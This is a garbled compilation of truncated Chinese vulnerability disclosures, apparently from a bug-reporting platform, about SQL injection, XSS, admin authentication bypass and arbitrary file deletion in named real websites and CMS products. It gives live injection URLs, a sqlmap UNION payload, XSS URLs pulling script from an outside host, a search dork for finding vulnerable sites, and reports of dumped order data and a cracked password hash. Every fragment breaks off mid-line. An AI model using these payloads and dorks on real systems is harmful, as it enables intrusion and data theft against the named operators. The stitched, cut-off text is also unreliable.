还是 protected\controllers\simple.php文件
public function order_act(){
.................
$address = $model->table("address")->where("id=$address_id")->find();
//if(!$address)$this->redirect("order",false,Req::args());
//if(!$payment_...
网御星云--一个不安全的安全厂商
网御星云的电子订单管理系统,可以爆sql注入。ORACLE数据库成功列出,随便找了个用户,破了md5加密,进入订单系统,所有订单一览无余。想问问你们,这个真的不重要吗,安全厂商……………………
给你看注入点:
http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?cu...
一枚注入直接出数据非盲注。就用官方给的演示站做测试。不知道你们有没有小礼物呢?
详细说明:
/app/controller/contentController.php
class contentController extends Controller{
private $content;
public function __construct(){
$this->content=M("module")->content($_...
Search.php文件:
GhostAsp参数过滤不严厉,直接带入了查询。
Qnews.php文件:
ID参数过滤不严,直接带入差。
---
Place: GET
Parameter: GhostAsp
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: LM=Newspaper&Key=1&GhostAsp=Title UNI...
某国际机票建站系统后台权限绕过导致可进入后台
搜索 inurl:Flight/InternationalTicket.asp
找到约 3,240 条结果 (用时 0.23 秒)
用的人不多,但是也是有一些网站在用的 比如 http://www.tokair.com/
cookies:
AJSTAT_ok_times=2; pgv_pvi=8454968320; AJSTAT_ok_times=3; AJSTAT...
直接看到/app/model/attackAction.class.php这个文件
public function initLogHacker() {
/*get*/
foreach($_GET as $key=>$value){
if (!in_array($key, array('ac','a','c','do'))){//防止控制器和方法命名不规范被过滤
$this->StopAttack($key,$value,"get",$this->getfilter);
...
Dedecms 一处 XSS漏洞,有图就有真相
http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3E
http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xs...
POST /mydns/recordsList.do HTTP/1.1
Host: mydns3.xinnet.com
Proxy-Connection: keep-alive
Content-Length: 842
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mydns3.xinnet.com
User-Agent: Mozil...
联想产品多业务广,旗下有很多销售业务相关的管理后台,然而部分这类网站的安全状况堪忧。
网站:http://www.lenovostoreapp.com/
后台登陆处存在post注入:http://www.lenovostoreapp.com/admin/index.php
抓post包扔进sqlmap:
sqlmap identified the following injection points w...
CmsEasy多出任意文件删除,可直接删除waf,Getshell so Easy !
CmsEasy在后台权限验证存在缺陷,导致登陆绕过,以及越权操作后台。
1、在后台登陆验证时存在缺陷,导致随意登陆绕过
2、在进行后台功能操作时,验证不全,存在缺陷,导致越权操作
3、通过上面的问题任意用户,包括非登录用户即可操作后...